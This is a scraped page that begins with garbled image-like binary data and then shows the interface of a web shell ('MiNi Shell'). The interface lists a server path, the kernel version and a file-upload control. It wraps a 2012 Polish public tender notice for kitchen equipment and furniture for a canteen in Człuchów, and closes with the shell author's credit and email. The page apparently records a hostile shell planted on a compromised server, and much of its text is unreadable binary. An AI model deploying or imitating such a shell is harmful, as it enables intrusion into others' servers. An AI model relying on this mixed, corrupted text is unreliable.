JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120216/47588-N-2012.html

<p class="kh_header"><b>Człuchów: Zakup i dostawa sprzętu kuchennego oraz mebli do pomieszczeń stołówki i zaplecza kuchennego</b><br>
<b>Numer ogłoszenia: 47588 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wdrożeń i Usług Technicznych przy Starostwie Powiatowym w Człuchowie , ul. Wojska Polskiego 1, 77-300 Człuchów, woj. pomorskie, tel. 059 8342539, 8343461 - 463, faks 059 8342539.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.powiatczluchowski.org.pl/   zakładka jednostki organizacyjne Zakład Wdrożeń i Usług Tech</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu kuchennego oraz mebli do pomieszczeń stołówki i zaplecza kuchennego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet I
1. Pojemnik gastronomiczny GN 1/6 ze stali nierdzewnej z ruchomymi uchwytami H-200mm- 10 szt
2. Pojemnik gastronomiczny GN 1/3 ze stali nierdzewnej z ruchomymi uchwytami H-200mm- 10 szt
3. Pojemnik gastronomiczny GN 1/2 ze stali nierdzewnej z ruchomymi uchwytami H-150mm- 5 szt
4. Pokrywa z wycięciem na uchwyty GN 1/6- 10 szt
5. Pokrywa z wycięciem na uchwyty GN 1/3- 10 szt
6. Pokrywa z wycięciem na uchwyty GN 1/2- 5 szt
7. Pojemnik gastronomiczny GN 1/2 ze stali nierdzewnej standard   H-150mm- 5 szt
8. Pokrywa z uszczelką GN 1/2- 5 szt
9. Termos stalowy ze stali nierdzewnej O340mm, H-270mm, V-15L- 3 szt
10. Termos stalowy O ok.390mm, H ok.330mm, V-25L- 3 szt
11. Termos cateringowy V- 9,5 L. Obudowa wykonana ze stali nierdzewnej a wnętrze z aluminium- 2 szt
12. Podgrzewacz  ze stali nierdzewnej zarówno na paliwo i grzałkę elektryczną. Pokrywa Roll-Top otwierana o 90°- 1 szt
13. Grzałka elektryczna z symostatem do podgrzewacza ze stali nierdzewnej-1 szt
14. Paliwo do podgrzewaczy gastronomicznych np. z glikolu bezzapachowego wystarczające na minimum 4h 1 szt.-20 szt
15. Przybory do serwowania: podstawa,widelec i łyżka (do podgrzewaczy ze stali nierdzewnej)-1 szt
16. Naczynie żaroodporne o pojemności 5,1L- 4 szt
17. Foremka do pieczenia emaliowana ze stali węglowej (dł.-350mm, szer.130mm i H.8mm)-10 szt
18. Maszynka do mielenia mięsa ( wilk) ze stali nierdzewnej -  wydajność minimum 300 kg/h.- 1 szt
19. Waga sklepowa elektroniczna z zakresem ważenia do 10kg, zasilana z zasilacza sieciowego i szalką ze stali nierdzewnej-2 szt
20. Wózek 3 półkowy kelnerski ze stali nierdzewnej na gumowych kółkach- 1 szt
21. Profesjonalna krajalnica z tarczą chromowaną. Podstawa wykonana z lakierowanego aluminium a osłona noża, taca podawcza oraz ruchoma ścianka wykonane z anodowanego aluminium.O noża 300mm- 1 szt
22. Talerz głęboki z poliwęglanu fi 229mm koloru szaroniebieskiego- 150 szt
23. Talerz płytki z poliwęglanu fi 229mm koloru szaroniebieskiego-150 szt
24. Kubek  z poliwęglanu76mm, poj. 288ml koloru szaroniebieskiego- 150 szt
25. Miseczka fi 133mm, poj. 452ml koloru szaroniebieskiego-50 szt
26. Sztućce,zestaw restauracyjny (łyżka stołowa, widelec stołowy, nóż stołowy i łyżeczka do herbaty) wykonane ze stali nierdzewnej 18/10 - 150 kpl
27. Patelnia ze stali nierdzewnej O360mm i H-65mm-1 szt
28. Patelnia stalowa z powłoką teflonową O320mmi H-52mm-1 szt
29. Patelnia aluminiowa głęboka z powłoką teflonową O280mm, H-75mm i V-3,8L- 1 szt
30. Patelnia aluminiowa głęboka z powłoką teflonową O240mm, H-65mm i V-2,6L- 1 szt
31. Profesjonalna patelnia aluminiowa z powłoką teflonową(3 warstwowe pokrycie) O 400mm i H-60mm- 1 szt
32. Profesjonalna patelnia aluminiowa z powłoką teflonową (3 warstwowe pokrycie) O 360mmi i H-55mm- 1 szt
33. Cedzak ze stali nierdzewnej O 260mm z rączką- 1 szt
34. Cedzak ze stali nierdzewnej O 360mm z uchwytami-1 szt
35. Przybory kuchenne - Łyżka nabierakowa ze stali nierdzewnej L-380mm-2 szt
36. Przybory kuchenne - Cedzak siatkowy  ze stali nierdzewnej O 200mm  i L-450mm- 1 szt
37. Przybory kuchenne - Cedzak siatkowy  ze stali nierdzewnej O 160mmi i L-470mm- 1 szt
38. Przybory kuchenne - Cedzak siatkowy  O 200mm i L-590mm-1 szt
39. Wydrążacz do jabłek ze stali nierdzewnej O 20mm- 2 szt
40. Deska do krojenia z polietylenu kolorowa 450x300mm.Następujące kolory: 2szt.czerwone, 3szt.zielone, 3szt.brązowe i  2szt.białe- 10 szt
41. Tłuczek aluminiowy o masie 0,4kg- 2 szt
42. Szufelka stalowa ze stali nierdzewnej: 2szt. V-0,450L i 1szt. V-0,650L- 3 szt
43. Pojemnik na odpady z polipropylenu (kontener 120l, pokrywa uchylna, podstawa na kołach)- 2 szt
44. Lampa owadobójcza o zasięgu działania minimum 30m2.- 2 szt
45. Świetlówka do lampy owadobójczej- 10 szt

pakiet II
1. Szafa ubraniowa BHP potrójna z komorą dzielną, metalowa 1800x900x490- 1 szt
2. Ławka z siedziskiem tapicerowanym i oparciem drewnianym wykonana z drewna bukowego ok.100cm- - 1 szt
3. Ławka z siedziskiem tapicerowanym i oparciem drewnianym wykonana z drewna bukowego ok.150-180cm- 1 szt
4. Krzesło ISO- 100 szt
5. Stół uniwersalny 80x80cm - podstawa stelaż-20 szt
6. Regał wolnostojący z polietylenu  o wymiarach: W-3660mm, H-1800mm i D-610mm.Regał ma się składać z 12 półek D-610mm, 4 boków H-1800mm i D-610mm- 2 szt
7. Regał magazynowy półki perforowane ze stali nierdzewnej W-1400mm, H-1800mm i D-700mm- 1 szt
Wszystkie podane wyżej wymiary mogą odbiegać od podanego o ?2%..
Warunki gwarancji minimum 24 miesiące..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6, 39.22.10.00-7, 39.33.00.00-4, 42.92.32.10-7, 34.91.21.00-4, 34.92.84.80-6, 39.22.11.50-3, 39.71.14.20-9, 39.10.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. 
b) Szczegółowy opis proponowanego przedmiotu zamówienia z ewentualnymi fotosami lub rysunkami.
c) Kalkulacja cenowa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiatczluchowski.org.pl/   zakładka jednostki organizacyjne Zakład Wdrożeń i Usług Techn<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wdrożeń i Usług Technicznych przy Starostwie Powiatowym w Człuchowie, 77 - 300 Człuchów, ul. Wojska Polskiego 1, Dział Admin.-Gosp. (budynek Starostwa Powiatowego).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 12:00, miejsce: Starostwo Powiatowe w Człuchowie, 77-300 Człuchów ul. Wojska Polskiego 1 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com